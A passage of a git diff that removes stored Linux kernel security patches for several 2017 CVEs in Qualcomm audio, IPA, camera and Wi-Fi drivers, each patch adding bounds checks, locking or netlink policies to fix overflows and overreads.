- list_for_each_entry(region_elt, &audio->ion_region_queue, list) {
- if (addr >= region_elt->vaddr &&
- addr < region_elt->vaddr + region_elt->len &&
-- addr + len <= region_elt->vaddr + region_elt->len) {
-+ addr + len <= region_elt->vaddr + region_elt->len &&
-+ addr + len > addr) {
-+ /* to avoid integer addition overflow */
-+
- /* offset since we could pass vaddr inside a registerd
- * ion buffer
- */
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-10998/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2017-10998/3.18/0002.patch
deleted file mode 100644
index 9d70672c..00000000
--- a/Patches/Linux_CVEs/CVE-2017-10998/3.18/0002.patch
+++ /dev/null
@@ -1,43 +0,0 @@
-From 208e72e59c8411e75d4118b48648a5b7d42b1682 Mon Sep 17 00:00:00 2001
-From: Siena Richard
-Date: Wed, 11 Jan 2017 11:09:24 -0800
-Subject: ASoC: msm: qdsp6v2: extend validation of virtual address
-
-Validate a buffer virtual address is fully within the region before
-returning the region to ensure functionality for an extended edge
-case.
-
-Change-Id: Iba3e080889980f393d6a9f0afe0231408b92d654
-Signed-off-by: Siena Richard
-CRs-fixed: 1108461
----
- drivers/misc/qcom/qdsp6v2/audio_utils_aio.c | 7 +++++--
- 1 file changed, 5 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c b/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c
-index 9ade557..c12f791 100644
---- a/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c
-+++ b/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c
-@@ -1,6 +1,6 @@
- /* Copyright (C) 2008 Google, Inc.
- * Copyright (C) 2008 HTC Corporation
-- * Copyright (c) 2009-2016, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2009-2017, The Linux Foundation. All rights reserved.
- *
- * This software is licensed under the terms of the GNU General Public
- * License version 2, as published by the Free Software Foundation, and
-@@ -119,7 +119,10 @@ static int audio_aio_ion_lookup_vaddr(struct q6audio_aio *audio, void *addr,
- list_for_each_entry(region_elt, &audio->ion_region_queue, list) {
- if (addr >= region_elt->vaddr &&
- addr < region_elt->vaddr + region_elt->len &&
-- addr + len <= region_elt->vaddr + region_elt->len) {
-+ addr + len <= region_elt->vaddr + region_elt->len &&
-+ addr + len > addr) {
-+ /* to avoid integer addition overflow */
-+
- /* offset since we could pass vaddr inside a registerd
- * ion buffer
- */
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-10999/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-10999/ANY/0001.patch
deleted file mode 100644
index 8075517a..00000000
--- a/Patches/Linux_CVEs/CVE-2017-10999/ANY/0001.patch
+++ /dev/null
@@ -1,76 +0,0 @@
-From f51a152ad52108457ae6b1caf7a04857f25c4bed Mon Sep 17 00:00:00 2001
-From: Skylar Chang
-Date: Wed, 15 Mar 2017 21:27:35 -0700
-Subject: msm: ipa: fix security issues in ipa wan driver
-
-Fix the security issue in handling add mux channel event
-in ipa wan driver.
-
-Bug: 36490777
-Change-Id: Ic2ffeafddad4954ec3ecba0d675646d0790eede7
-Signed-off-by: Skylar Chang
-Acked-by: Shihuan Liu
----
- drivers/platform/msm/ipa/rmnet_ipa.c | 8 +++++++-
- 1 file changed, 7 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/platform/msm/ipa/rmnet_ipa.c b/drivers/platform/msm/ipa/rmnet_ipa.c
-index a149a9e..0d6fb33 100644
---- a/drivers/platform/msm/ipa/rmnet_ipa.c
-+++ b/drivers/platform/msm/ipa/rmnet_ipa.c
-@@ -57,6 +57,7 @@ static atomic_t is_initialized;
- static atomic_t is_ssr;
-
- u32 apps_to_ipa_hdl, ipa_to_apps_hdl; /* get handler from ipa */
-+static struct mutex add_mux_channel_lock;
- static int wwan_add_ul_flt_rule_to_ipa(void);
- static int wwan_del_ul_flt_rule_to_ipa(void);
-
-@@ -1242,9 +1243,11 @@ static int ipa_wwan_ioctl(struct net_device *dev, struct ifreq *ifr, int cmd)
- rmnet_mux_val.mux_id);
- return rc;
- }
-+ mutex_lock(&add_mux_channel_lock);
- if (rmnet_index >= MAX_NUM_OF_MUX_CHANNEL) {
- IPAWANERR("Exceed mux_channel limit(%d)\n",
- rmnet_index);
-+ mutex_unlock(&add_mux_channel_lock);
- return -EFAULT;
- }
- IPAWANDBG("ADD_MUX_CHANNEL(%d, name: %s)\n",
-@@ -1270,6 +1273,7 @@ static int ipa_wwan_ioctl(struct net_device *dev, struct ifreq *ifr, int cmd)
- IPAWANERR("device %s reg IPA failed\n",
- extend_ioctl_data.u.
- rmnet_mux_val.vchannel_name);
-+ mutex_unlock(&add_mux_channel_lock);
- return -ENODEV;
- }
- mux_channel[rmnet_index].mux_channel_set = true;
-@@ -1282,6 +1286,7 @@ static int ipa_wwan_ioctl(struct net_device *dev, struct ifreq *ifr, int cmd)
- mux_channel[rmnet_index].ul_flt_reg = false;
- }
- rmnet_index++;
-+ mutex_unlock(&add_mux_channel_lock);
- break;
- case RMNET_IOCTL_SET_EGRESS_DATA_FORMAT:
- IPAWANDBG("get RMNET_IOCTL_SET_EGRESS_DATA_FORMAT\n");
-@@ -2050,7 +2055,7 @@ static int __init ipa_wwan_init(void)
-
- atomic_set(&is_initialized, 0);
- atomic_set(&is_ssr, 0);
--
-+ mutex_init(&add_mux_channel_lock);
- /* Register for Modem SSR */
- subsys = subsys_notif_register_notifier(SUBSYS_MODEM, &ssr_notifier);
- if (!IS_ERR(subsys))
-@@ -2061,6 +2066,7 @@ static int __init ipa_wwan_init(void)
-
- static void __exit ipa_wwan_cleanup(void)
- {
-+ mutex_destroy(&add_mux_channel_lock);
- platform_driver_unregister(&rmnet_ipa_driver);
- }
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11000/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-11000/ANY/0001.patch
deleted file mode 100644
index 63c8233a..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11000/ANY/0001.patch
+++ /dev/null
@@ -1,33 +0,0 @@
-From af787fdedeb62964efaf9e969ad17e3b6c232082 Mon Sep 17 00:00:00 2001
-From: Gaoxiang Chen
-Date: Wed, 17 May 2017 15:14:36 +0800
-Subject: msm: camera: fix off-by-one overflow in msm_isp_get_bufq
-
-In msm_isp_get_bufq, if bufq_index equals buf_mgr->num_buf_q,
-it will pass the check, leading to off-by-one overflow
-(exceed the length of array by one element).
-
-CRs-Fixed: 2031677
-Bug: 36136563
-Change-Id: I7ea465897e2c37de6ca0155c3e225f1444b3cf13
-Signed-off-by: Gaoxiang Chen
----
- drivers/media/platform/msm/camera_v2/isp/msm_buf_mgr.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/isp/msm_buf_mgr.c b/drivers/media/platform/msm/camera_v2/isp/msm_buf_mgr.c
-index ee65528..433d59c 100644
---- a/drivers/media/platform/msm/camera_v2/isp/msm_buf_mgr.c
-+++ b/drivers/media/platform/msm/camera_v2/isp/msm_buf_mgr.c
-@@ -46,7 +46,7 @@ struct msm_isp_bufq *msm_isp_get_bufq(
-
- /* bufq_handle cannot be 0 */
- if ((bufq_handle == 0) ||
-- (bufq_index > buf_mgr->num_buf_q))
-+ (bufq_index >= buf_mgr->num_buf_q))
- return NULL;
-
- bufq = &buf_mgr->bufq[bufq_index];
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11001/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-11001/ANY/0001.patch
deleted file mode 100644
index f1499616..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11001/ANY/0001.patch
+++ /dev/null
@@ -1,49 +0,0 @@
-From d5d2c9baff89932e822ceae74b1569af07d55f19 Mon Sep 17 00:00:00 2001
-From: Srinivas Girigowda
-Date: Fri, 7 Jul 2017 11:58:04 -0700
-Subject: qcacld-2.0: Fix out of bound read issue in get link properties
-
-Length of the MAC address is not checked which may cause out of bound
-read issue.
-
-To resolve this add a check for MAC address length.
-
-CRs-Fixed: 2051433
-Change-Id: I58454b84c28b157cef35984d612a9bc6fdd9ec56
-Bug: 36815555
-Signed-off-by: Srinivas Girigowda
----
- drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_cfg80211.c | 10 +++++++++-
- 1 file changed, 9 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_cfg80211.c b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_cfg80211.c
-index c153928..6d99f2d 100644
---- a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_cfg80211.c
-+++ b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_cfg80211.c
-@@ -8481,7 +8481,8 @@ static int __wlan_hdd_cfg80211_wifi_logger_start(struct wiphy *wiphy,
- static const struct
- nla_policy
- qca_wlan_vendor_attr_policy[QCA_WLAN_VENDOR_ATTR_MAX+1] = {
-- [QCA_WLAN_VENDOR_ATTR_MAC_ADDR] = { .type = NLA_UNSPEC },
-+ [QCA_WLAN_VENDOR_ATTR_MAC_ADDR] = {
-+ .type = NLA_BINARY, .len = VOS_MAC_ADDR_SIZE },
- };
-
- /**
-@@ -8536,6 +8537,13 @@ static int __wlan_hdd_cfg80211_get_link_properties(struct wiphy *wiphy,
- return -EINVAL;
- }
-
-+ if (nla_len(tb[QCA_WLAN_VENDOR_ATTR_MAC_ADDR]) < sizeof(peer_mac)) {
-+ hddLog(VOS_TRACE_LEVEL_ERROR,
-+ FL("Attribute peerMac is invalid=%d"),
-+ adapter->device_mode);
-+ return -EINVAL;
-+ }
-+
- memcpy(peer_mac, nla_data(tb[QCA_WLAN_VENDOR_ATTR_MAC_ADDR]),
- sizeof(peer_mac));
- hddLog(VOS_TRACE_LEVEL_INFO,
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11002/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2017-11002/ANY/0002.patch
deleted file mode 100644
index 658443df..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11002/ANY/0002.patch
+++ /dev/null
@@ -1,88 +0,0 @@
-From 825eeb85d4866e362452b18df929a54a7c6111f6 Mon Sep 17 00:00:00 2001
-From: Srinivas Girigowda
-Date: Mon, 10 Jul 2017 11:50:46 -0700
-Subject: qcacld-2.0: Avoid concurrent matrix max param overread
-
-qcacld-3.0 to qcacld-2.0 propagation
-
-Currently there is no nl policy defined for vendor sub command
-QCA_NL80211_VENDOR_SUBCMD_GET_CONCURRENCY_MATRIX which may result in
-buffer overread error.
-
-To resolve this, add nl policy.
-
-Change-Id: I155efdbb07f1c5fe300bb2be0c2a3fe07c7e134b
-CRs-Fixed: 2058452
-Bug: 37712167
-Signed-off-by: Srinivas Girigowda
----
- .../qcacld-2.0/CORE/HDD/src/wlan_hdd_cfg80211.c | 24 ++++++++++++++++------
- 1 file changed, 18 insertions(+), 6 deletions(-)
-
-diff --git a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_cfg80211.c b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_cfg80211.c
-index 6d99f2d..13956f9 100644
---- a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_cfg80211.c
-+++ b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_cfg80211.c
-@@ -1666,6 +1666,15 @@ wlan_hdd_cfg80211_set_scanning_mac_oui(struct wiphy *wiphy,
- return ret;
- }
-
-+#define MAX_CONCURRENT_MATRIX \
-+ QCA_WLAN_VENDOR_ATTR_GET_CONCURRENCY_MATRIX_MAX
-+#define MATRIX_CONFIG_PARAM_SET_SIZE_MAX \
-+ QCA_WLAN_VENDOR_ATTR_GET_CONCURRENCY_MATRIX_CONFIG_PARAM_SET_SIZE_MAX
-+static const struct nla_policy
-+wlan_hdd_get_concurrency_matrix_policy[MAX_CONCURRENT_MATRIX + 1] = {
-+ [MATRIX_CONFIG_PARAM_SET_SIZE_MAX] = {.type = NLA_U32},
-+};
-+
- static int
- __wlan_hdd_cfg80211_get_concurrency_matrix(struct wiphy *wiphy,
- struct wireless_dev *wdev,
-@@ -1674,7 +1683,7 @@ __wlan_hdd_cfg80211_get_concurrency_matrix(struct wiphy *wiphy,
- {
- uint32_t feature_set_matrix[WLAN_HDD_MAX_FEATURE_SET] = {0};
- uint8_t i, feature_sets, max_feature_sets;
-- struct nlattr *tb[QCA_WLAN_VENDOR_ATTR_GET_CONCURRENCY_MATRIX_MAX + 1];
-+ struct nlattr *tb[MAX_CONCURRENT_MATRIX + 1];
- struct sk_buff *reply_skb;
- hdd_context_t *hdd_ctx = wiphy_priv(wiphy);
- int ret;
-@@ -1690,19 +1699,19 @@ __wlan_hdd_cfg80211_get_concurrency_matrix(struct wiphy *wiphy,
- if (0 != ret)
- return ret;
-
-- if (nla_parse(tb, QCA_WLAN_VENDOR_ATTR_GET_CONCURRENCY_MATRIX_MAX,
-- data, data_len, NULL)) {
-+ if (nla_parse(tb, MAX_CONCURRENT_MATRIX,
-+ data, data_len, wlan_hdd_get_concurrency_matrix_policy)) {
- hddLog(LOGE, FL("Invalid ATTR"));
- return -EINVAL;
- }
-
- /* Parse and fetch max feature set */
-- if (!tb[QCA_WLAN_VENDOR_ATTR_GET_CONCURRENCY_MATRIX_CONFIG_PARAM_SET_SIZE_MAX]) {
-+ if (!tb[MATRIX_CONFIG_PARAM_SET_SIZE_MAX]) {
- hddLog(LOGE, FL("Attr max feature set size failed"));
- return -EINVAL;
- }
-- max_feature_sets = nla_get_u32(
-- tb[QCA_WLAN_VENDOR_ATTR_GET_CONCURRENCY_MATRIX_CONFIG_PARAM_SET_SIZE_MAX]);
-+
-+ max_feature_sets = nla_get_u32(tb[MATRIX_CONFIG_PARAM_SET_SIZE_MAX]);
- hddLog(LOG1, FL("Max feature set size: %d"), max_feature_sets);
-
- /* Fill feature combination matrix */
-@@ -1744,6 +1753,9 @@ __wlan_hdd_cfg80211_get_concurrency_matrix(struct wiphy *wiphy,
- return -ENOMEM;
- }
-
-+#undef MAX_CONCURRENT_MATRIX
-+#undef MATRIX_CONFIG_PARAM_SET_SIZE_MAX
-+
- /**
- * wlan_hdd_cfg80211_get_concurrency_matrix() - get concurrency matrix
- * @wiphy: pointer to wireless wiphy structure.
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11002/prima/0001.patch b/Patches/Linux_CVEs/CVE-2017-11002/prima/0001.patch
deleted file mode 100644
index eaa262c5..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11002/prima/0001.patch
+++ /dev/null
@@ -1,85 +0,0 @@
-From 64c0865bb0c5a642ba420967b23e0f66e035b300 Mon Sep 17 00:00:00 2001
-From: Rajeev Kumar Sirasanagandla
-Date: Tue, 13 Jun 2017 12:04:09 +0530
-Subject: wlan: Avoid concurrent matrix max param overread
-
-qcacld-3.0 to prima propagation.
-
-Currently there is no nl policy defined for vendor sub command
-QCA_NL80211_VENDOR_SUBCMD_GET_CONCURRENCY_MATRIX which may result in
-buffer overread error.
-
-To resolve this, add nl policy.
-
-Change-Id: I155efdbb07f1c5fe300bb2be0c2a3fe07c7e134b
-CRs-Fixed: 2058455
----
- CORE/HDD/src/wlan_hdd_cfg80211.c | 23 +++++++++++++++++------
- 1 file changed, 17 insertions(+), 6 deletions(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_cfg80211.c b/CORE/HDD/src/wlan_hdd_cfg80211.c
-index b8f74cc..0c36e73 100644
---- a/CORE/HDD/src/wlan_hdd_cfg80211.c
-+++ b/CORE/HDD/src/wlan_hdd_cfg80211.c
-@@ -4985,6 +4985,15 @@ wlan_hdd_cfg80211_get_supported_features(struct wiphy *wiphy,
- return ret;
- }
-
-+#define MAX_CONCURRENT_MATRIX \
-+ QCA_WLAN_VENDOR_ATTR_GET_CONCURRENCY_MATRIX_MAX
-+#define MATRIX_CONFIG_PARAM_SET_SIZE_MAX \
-+ QCA_WLAN_VENDOR_ATTR_GET_CONCURRENCY_MATRIX_CONFIG_PARAM_SET_SIZE_MAX
-+static const struct nla_policy
-+wlan_hdd_get_concurrency_matrix_policy[MAX_CONCURRENT_MATRIX + 1] = {
-+ [MATRIX_CONFIG_PARAM_SET_SIZE_MAX] = {.type = NLA_U32},
-+};
-+
- static int
- __wlan_hdd_cfg80211_get_concurrency_matrix(struct wiphy *wiphy,
- struct wireless_dev *wdev,
-@@ -4992,7 +5001,7 @@ __wlan_hdd_cfg80211_get_concurrency_matrix(struct wiphy *wiphy,
- {
- uint32_t feature_set_matrix[WLAN_HDD_MAX_FEATURE_SET] = {0};
- uint8_t i, feature_sets, max_feature_sets;
-- struct nlattr *tb[QCA_WLAN_VENDOR_ATTR_GET_CONCURRENCY_MATRIX_MAX + 1];
-+ struct nlattr *tb[MAX_CONCURRENT_MATRIX + 1];
- struct sk_buff *reply_skb;
- hdd_context_t *pHddCtx = wiphy_priv(wiphy);
- int ret;
-@@ -5005,19 +5014,18 @@ __wlan_hdd_cfg80211_get_concurrency_matrix(struct wiphy *wiphy,
- return ret;
- }
-
-- if (nla_parse(tb, QCA_WLAN_VENDOR_ATTR_GET_CONCURRENCY_MATRIX_MAX,
-- data, data_len, NULL)) {
-+ if (nla_parse(tb, MAX_CONCURRENT_MATRIX, data, data_len,
-+ wlan_hdd_get_concurrency_matrix_policy)) {
- hddLog(LOGE, FL("Invalid ATTR"));
- return -EINVAL;
- }
-
- /* Parse and fetch max feature set */
-- if (!tb[QCA_WLAN_VENDOR_ATTR_GET_CONCURRENCY_MATRIX_CONFIG_PARAM_SET_SIZE_MAX]) {
-+ if (!tb[MATRIX_CONFIG_PARAM_SET_SIZE_MAX]) {
- hddLog(LOGE, FL("Attr max feature set size failed"));
- return -EINVAL;
- }
-- max_feature_sets = nla_get_u32(
-- tb[QCA_WLAN_VENDOR_ATTR_GET_CONCURRENCY_MATRIX_CONFIG_PARAM_SET_SIZE_MAX]);
-+ max_feature_sets = nla_get_u32(tb[MATRIX_CONFIG_PARAM_SET_SIZE_MAX]);
- hddLog(LOG1, FL("Max feature set size (%d)"), max_feature_sets);
-
- /* Fill feature combination matrix */
-@@ -5068,6 +5076,9 @@ __wlan_hdd_cfg80211_get_concurrency_matrix(struct wiphy *wiphy,
-
- }
-
-+#undef MAX_CONCURRENT_MATRIX
-+#undef MATRIX_CONFIG_PARAM_SET_SIZE_MAX
-+
- static int
- wlan_hdd_cfg80211_get_concurrency_matrix(struct wiphy *wiphy,
- struct wireless_dev *wdev,
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11012/qcacld-3.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-11012/qcacld-3.0/0001.patch
deleted file mode 100644
index fdd7dc56..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11012/qcacld-3.0/0001.patch
+++ /dev/null
@@ -1,94 +0,0 @@
-From 7d0e40d328fa092c36b9585516ed29fc6041be55 Mon Sep 17 00:00:00 2001
-From: Jeff Johnson
-Date: Tue, 6 Jun 2017 12:53:28 -0700
-Subject: qcacld-3.0: Fix buffer overread & overflow in DISA handler
-
-Currently in hdd_fill_encrypt_decrypt_params() there are multiple
-issues with the incoming cfg80211 vendor command handling:
-1) A policy is not supplied when invoking nla_parse() which prevents
- basic sanity of the incoming attribute stream.
-2) The length of attribute QCA_WLAN_VENDOR_ATTR_ENCRYPTION_TEST_PN is
- not properly validated.
-3) The length of attribute QCA_WLAN_VENDOR_ATTR_ENCRYPTION_TEST_DATA
- is not properly validated.
-
-To address these issues:
-1) Create an appropriate nla_policy and specify this policy when
- invoking nla_parse().
-2) Validate the length of QCA_WLAN_VENDOR_ATTR_ENCRYPTION_TEST_PN to
- prevent potential buffer overflow.
-3) Validate the length of QCA_WLAN_VENDOR_ATTR_ENCRYPTION_TEST_DATA to
- prevent potential buffer overread.
-
-Change-Id: Ibb86897f249010c94c4098b283aad7a7f95ab9a2
-CRs-Fixed: 2054760
----
- core/hdd/src/wlan_hdd_disa.c | 24 +++++++++++++++++++-----
- 1 file changed, 19 insertions(+), 5 deletions(-)
-
-diff --git a/core/hdd/src/wlan_hdd_disa.c b/core/hdd/src/wlan_hdd_disa.c
-index c2e99d1..39e6bd1 100644
---- a/core/hdd/src/wlan_hdd_disa.c
-+++ b/core/hdd/src/wlan_hdd_disa.c
-@@ -159,6 +159,16 @@ nla_put_failure:
- return -EINVAL;
- }
-
-+static const struct nla_policy
-+encrypt_decrypt_policy[QCA_WLAN_VENDOR_ATTR_ENCRYPTION_TEST_MAX + 1] = {
-+ [QCA_WLAN_VENDOR_ATTR_ENCRYPTION_TEST_NEEDS_DECRYPTION] = {
-+ .type = NLA_FLAG},
-+ [QCA_WLAN_VENDOR_ATTR_ENCRYPTION_TEST_KEYID] = {
-+ .type = NLA_U8},
-+ [QCA_WLAN_VENDOR_ATTR_ENCRYPTION_TEST_CIPHER] = {
-+ .type = NLA_U32},
-+};
-+
- /**
- * hdd_fill_encrypt_decrypt_params () - parses data from user space
- * and fills encrypt/decrypt parameters
-@@ -181,7 +191,7 @@ static int hdd_fill_encrypt_decrypt_params(struct encrypt_decrypt_req_params
- uint8_t fc[2];
-
- if (nla_parse(tb, QCA_WLAN_VENDOR_ATTR_ENCRYPTION_TEST_MAX,
-- data, data_len, NULL)) {
-+ data, data_len, encrypt_decrypt_policy)) {
- hdd_err("Invalid ATTR");
- return -EINVAL;
- }
-@@ -243,8 +253,8 @@ static int hdd_fill_encrypt_decrypt_params(struct encrypt_decrypt_req_params
- return -EINVAL;
- }
- len = nla_len(tb[QCA_WLAN_VENDOR_ATTR_ENCRYPTION_TEST_PN]);
-- if (!len) {
-- hdd_err("Invalid PN length");
-+ if (!len || len > sizeof(encrypt_decrypt_params->pn)) {
-+ hdd_err("Invalid PN length %u", len);
- return -EINVAL;
- }
-
-@@ -260,8 +270,8 @@ static int hdd_fill_encrypt_decrypt_params(struct encrypt_decrypt_req_params
- return -EINVAL;
- }
- len = nla_len(tb[QCA_WLAN_VENDOR_ATTR_ENCRYPTION_TEST_DATA]);
-- if (!len) {
-- hdd_err("Invalid header and payload length");
-+ if (len < MIN_MAC_HEADER_LEN) {
-+ hdd_err("Invalid header and payload length %u", len);
- return -EINVAL;
- }
-
-@@ -298,6 +308,10 @@ static int hdd_fill_encrypt_decrypt_params(struct encrypt_decrypt_req_params
-
- hdd_notice("mac_hdr_len %d", mac_hdr_len);
-
-+ if (len < mac_hdr_len) {
-+ hdd_err("Invalid header and payload length %u", len);
-+ return -EINVAL;
-+ }
- qdf_mem_copy(encrypt_decrypt_params->mac_header,
- tmp, mac_hdr_len);
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11013/prima/0001.patch b/Patches/Linux_CVEs/CVE-2017-11013/prima/0001.patch
deleted file mode 100644
index 9fe9afdb..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11013/prima/0001.patch
+++ /dev/null
@@ -1,87 +0,0 @@
-From 64297e4caffdf6b1a90807bbdb65a66b43582228 Mon Sep 17 00:00:00 2001
-From: Sridhar Selvaraj
-Date: Fri, 30 Jun 2017 19:11:21 +0530
-Subject: prima: Skip an IE if found more its max times in a frame
-
-Check if a IE has been encountered more than max possible for that IE
-while parsing a frame.
-
-Change-Id: I1054c7df18780469849be55fc4343f09ac502a49
-CRs-Fixed: 2069927
----
- CORE/MAC/src/include/dot11f.h | 6 +++---
- CORE/SYS/legacy/src/utils/src/dot11f.c | 9 +++++++--
- 2 files changed, 10 insertions(+), 5 deletions(-)
-
-diff --git a/CORE/MAC/src/include/dot11f.h b/CORE/MAC/src/include/dot11f.h
-index ab2228e..52c714e 100644
---- a/CORE/MAC/src/include/dot11f.h
-+++ b/CORE/MAC/src/include/dot11f.h
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2012-2014 The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2012-2014, 2017 The Linux Foundation. All rights reserved.
- *
- * Previously licensed under the ISC license by Qualcomm Atheros, Inc.
- *
-@@ -30,7 +30,7 @@
- *
- *
- * This file was automatically generated by 'framesc'
-- * Mon Nov 10 19:49:53 2014 from the following file(s):
-+ * Tue Jul 4 11:19:48 2017 from the following file(s):
- *
- * dot11f.frms
- *
-@@ -84,8 +84,8 @@ typedef tANI_U32 tDOT11F_U64[2];
- #define DOT11F_BUFFER_OVERFLOW ( 0x10000005 )
- #define DOT11F_MANDATORY_TLV_MISSING ( 0x00001000 )
- #define DOT11F_FAILED(code) ( (code) & 0x10000000 )
--#define DOT11F_WARNED(code) ( ( ( 0 == (code) ) & 0x10000000 ) && code)
- #define DOT11F_SUCCEEDED(code) ( (code) == 0 )
-+#define DOT11F_WARNED(code) (!DOT11F_SUCCEEDED(code) && !DOT11F_FAILED(code))
-
- /*********************************************************************
- * Fixed Fields *
-diff --git a/CORE/SYS/legacy/src/utils/src/dot11f.c b/CORE/SYS/legacy/src/utils/src/dot11f.c
-index a4fbb05..f3f621c 100644
---- a/CORE/SYS/legacy/src/utils/src/dot11f.c
-+++ b/CORE/SYS/legacy/src/utils/src/dot11f.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2012-2014 The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2012-2014, 2017 The Linux Foundation. All rights reserved.
- *
- * Previously licensed under the ISC license by Qualcomm Atheros, Inc.
- *
-@@ -28,7 +28,7 @@
- *
- *
- * This file was automatically generated by 'framesc'
-- * Mon Nov 10 19:49:53 2014 from the following file(s):
-+ * Tue Jul 4 11:19:48 2017 from the following file(s):
- *
- * dot11f.frms
- *
-@@ -20733,6 +20733,10 @@ static tANI_U32 UnpackCore(tpAniSirGlobal pCtx,
- }
-
- countOffset = ( (0 != pIe->arraybound) * ( *(tANI_U16* )(pFrm + pIe->countOffset)));
-+ if (0 != pIe->arraybound && countOffset >= pIe->arraybound) {
-+ status |= DOT11F_DUPLICATE_IE;
-+ goto skip_dup_ie;
-+ }
- switch (pIe->sig)
- {
- case SigIeAPName:
-@@ -21207,6 +21211,7 @@ static tANI_U32 UnpackCore(tpAniSirGlobal pCtx,
- status |= DOT11F_UNKNOWN_IES;
- }
-
-+skip_dup_ie:
- pBufRemaining += len;
-
- if (len > nBufRemaining)
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11013/qcacld-2.0/0002.patch b/Patches/Linux_CVEs/CVE-2017-11013/qcacld-2.0/0002.patch
deleted file mode 100644
index 4ae65834..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11013/qcacld-2.0/0002.patch
+++ /dev/null
@@ -1,63 +0,0 @@
-diff --git a/drivers/staging/qcacld-2.0/CORE/MAC/src/include/dot11f.h b/drivers/staging/qcacld-2.0/CORE/MAC/src/include/dot11f.h
-index 111c093..10f1872 100644
---- a/drivers/staging/qcacld-2.0/CORE/MAC/src/include/dot11f.h
-+++ b/drivers/staging/qcacld-2.0/CORE/MAC/src/include/dot11f.h
-@@ -24,7 +24,6 @@
- * under proprietary terms before Copyright ownership was assigned
- * to the Linux Foundation.
- */
--
- #ifndef DOT11F_H
- #define DOT11F_H
- /**
-@@ -37,7 +36,7 @@
- *
- *
- * This file was automatically generated by 'framesc'
-- * Tue Sep 29 17:32:33 2015 from the following file(s):
-+ * Tue Jul 4 11:07:27 2017 from the following file(s):
- *
- * dot11f.frms
- *
-@@ -91,8 +90,8 @@
- #define DOT11F_BUFFER_OVERFLOW ( 0x10000005 )
- #define DOT11F_MANDATORY_TLV_MISSING ( 0x00001000 )
- #define DOT11F_FAILED(code) ( (code) & 0x10000000 )
--#define DOT11F_WARNED(code) ( ( ( 0 == (code) ) & 0x10000000 ) && code)
- #define DOT11F_SUCCEEDED(code) ( (code) == 0 )
-+#define DOT11F_WARNED(code) (!DOT11F_SUCCEEDED(code) && !DOT11F_FAILED(code))
-
- /*********************************************************************
- * Fixed Fields *
-diff --git a/drivers/staging/qcacld-2.0/CORE/SYS/legacy/src/utils/src/dot11f.c b/drivers/staging/qcacld-2.0/CORE/SYS/legacy/src/utils/src/dot11f.c
-index 0f542d0..c19e9c0 100644
---- a/drivers/staging/qcacld-2.0/CORE/SYS/legacy/src/utils/src/dot11f.c
-+++ b/drivers/staging/qcacld-2.0/CORE/SYS/legacy/src/utils/src/dot11f.c
-@@ -35,7 +35,7 @@
- *
- *
- * This file was automatically generated by 'framesc'
-- * Tue Sep 29 17:32:33 2015 from the following file(s):
-+ * Tue Jul 4 11:07:27 2017 from the following file(s):
- *
- * dot11f.frms
- *
-@@ -18778,6 +18778,10 @@
- }
-
- countOffset = ( (0 != pIe->arraybound) * ( *(tANI_U16* )(pFrm + pIe->countOffset)));
-+ if (0 != pIe->arraybound && countOffset >= pIe->arraybound) {
-+ status |= DOT11F_DUPLICATE_IE;
-+ goto skip_dup_ie;
-+ }
- switch (pIe->sig)
- {
- case SigIeCondensedCountryStr:
-@@ -19215,6 +19219,7 @@
- status |= DOT11F_UNKNOWN_IES;
- }
-
-+skip_dup_ie:
- pBufRemaining += len;
-
- if (len > nBufRemaining)
diff --git a/Patches/Linux_CVEs/CVE-2017-11013/qcacld-2.0/0002.patch.base64 b/Patches/Linux_CVEs/CVE-2017-11013/qcacld-2.0/0002.patch.base64
deleted file mode 100644
index 83d01d6b..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11013/qcacld-2.0/0002.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-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
\ No newline at end of file
